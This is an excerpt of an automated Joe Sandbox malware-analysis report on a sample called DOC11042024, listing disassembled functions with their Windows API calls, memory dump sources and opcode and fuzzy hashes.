                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              • String ID:
                                                                              • API String ID: 1136574915-0
                                                                              • Opcode ID: e9060f6b245a37f56f57398021f8afda1d99aae150a2646af934d03bf3ace4fd
                                                                              • Instruction ID: 28e908a6165a13ae20b5456a54398491662dd313bd445d62b915cc3bb3bf236f
                                                                              • Opcode Fuzzy Hash: e9060f6b245a37f56f57398021f8afda1d99aae150a2646af934d03bf3ace4fd
                                                                              • Instruction Fuzzy Hash: C8E08C72B04110DBDB21BBA4AA8859D7264EB50369B1005BBF402F10D2C6B85C42DA3E
                                                                              Function 00405B2B Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                              • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                              • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                              • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                              Function 00405B06 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,?,004056F5,?,?,00000000,004058E1,?,?,?,?), ref: 00405B0B
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B1F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                              • Instruction ID: 8113dfa97b81082f8cf2b73423fd644a7912fc485d929263289a92eefa3d8618
                                                                              • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                              • Instruction Fuzzy Hash: DAD01272908020AFD2102728FE0C89BBF65DB543717018B31FD75A22F0C7305C52CAB6
                                                                              Function 0040165E Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401679
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileMove
                                                                              • String ID:
                                                                              • API String ID: 3562171763-0
                                                                              • Opcode ID: 8fe79ce3c2b313a95c379856455a1f2e01201a62c76f8117580e46350af60910
                                                                              • Instruction ID: 5e5934034a73616b7c5c936e1d535abeea833b9c873949bf5210412842da6fbc
                                                                              • Opcode Fuzzy Hash: 8fe79ce3c2b313a95c379856455a1f2e01201a62c76f8117580e46350af60910
                                                                              • Instruction Fuzzy Hash: 13F05435708121E2CB20B7B55F4DE9E25A4DF42368F24073BF123B61D1DAFD8942966E
                                                                              Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID:
                                                                              • API String ID: 390214022-0
                                                                              • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                                              • Instruction ID: 4d522e8bde3653b981076e9042a854f7c5429d371814473e34f0fcc773409074
                                                                              • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                                              • Instruction Fuzzy Hash: CAE0E632A041696ADB2036F20E8DD7F3058DB54754F15057FB513BA2C2DDFC0D815AAD
                                                                              Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                              • Instruction ID: b0bbdecf46b64206e012d84e5d9e673a6d3cc271936ee21996476f731e1d4893
                                                                              • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                              • Instruction Fuzzy Hash: 12E0B676290108BADB11EFA5ED4AFA577ECEB08705F108425BA09E6091D674F5508BAC
                                                                              Function 0040329F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00413E78,0040BE78,004031A4,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000), ref: 004032B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 476de8a6d54054254eaeab11a76a7e936c9490da6f321b020811133c829fda6c
                                                                              • Instruction ID: 88158c925b015a47486c1d05f200f8b2f8795a110b6c7e6efd1e7249e7db3a8e
                                                                              • Opcode Fuzzy Hash: 476de8a6d54054254eaeab11a76a7e936c9490da6f321b020811133c829fda6c
                                                                              • Instruction Fuzzy Hash: 1AE0863512411DBBCF205E619C00AE73B5CEB05761F00C076F908E5290D130DA059BA4
                                                                              Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 59866ceb49cacf040790d415b2c019d4a0985b36be580390669e01aa1b5dd8d7
                                                                              • Instruction ID: f3354cb8ce28efe1ca3c080267c8b1e00e40bfd903d5f796d394ce91db8ae015
                                                                              • Opcode Fuzzy Hash: 59866ceb49cacf040790d415b2c019d4a0985b36be580390669e01aa1b5dd8d7
                                                                              • Instruction Fuzzy Hash: 20D01272708111D7DB10DBE5AA0869D76649B01364F204577D112F21D0D2B89545DB2A
                                                                              Function 0040413D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                                              • Instruction ID: 612a704c865d3649b8a72a2dde830f20e644e2feb879a3b89d540ad9d03d68c4
                                                                              • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                                              • Instruction Fuzzy Hash: 42C09B71744300BBDB309B509D4DF1777596794B40F1444397314F51D4D674E451D61D
                                                                              Function 00404126 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                              • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                              • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                              • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                              Function 004032D1 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F7D,?), ref: 004032DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                              • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                              • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                              • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                              Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403EEB), ref: 0040411D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                              • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                                              • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                              • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

                                                                              Non-executed Functions

                                                                              Function 00404AD2 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404AEA
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404AF5
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B3F
                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404B52
                                                                              • SetWindowLongW.USER32(?,000000FC,004050CA), ref: 00404B6B
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B7F
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B91
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404BA7
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BB3
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BC5
                                                                              • DeleteObject.GDI32(00000000), ref: 00404BC8
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404BF3
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404BFF
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C95
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CC0
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD4
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D03
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D11
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E1F
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404E84
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E99
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EBD
